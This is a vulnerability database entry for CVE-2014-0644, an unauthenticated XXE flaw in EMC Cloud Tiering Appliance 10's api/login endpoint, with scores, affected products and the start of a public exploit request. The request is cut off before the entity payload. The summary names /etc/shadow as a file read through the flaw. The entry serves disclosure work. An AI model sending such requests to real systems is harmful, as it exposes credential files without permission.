CVE-2014-0644

Published: 17/04/2014 Updated: 17/04/2014
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Vulnerability Summary

EMC Cloud Tiering Appliance (CTA) 10 through SP1 allows remote malicious users to read arbitrary files via an api/login request containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, as demonstrated by reading the /etc/shadow file.

Vulnerable Product

emc cloud_tiering_appliance_software 10.0

emc cloud_tiering_appliance -

Exploits

EMC Cloud Tiering Appliance v10.0 Unauthed XXE

The following authentication request is susceptible to an XXE attack:

POST /api/login HTTP/1.1
Host: 172311699
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,e ...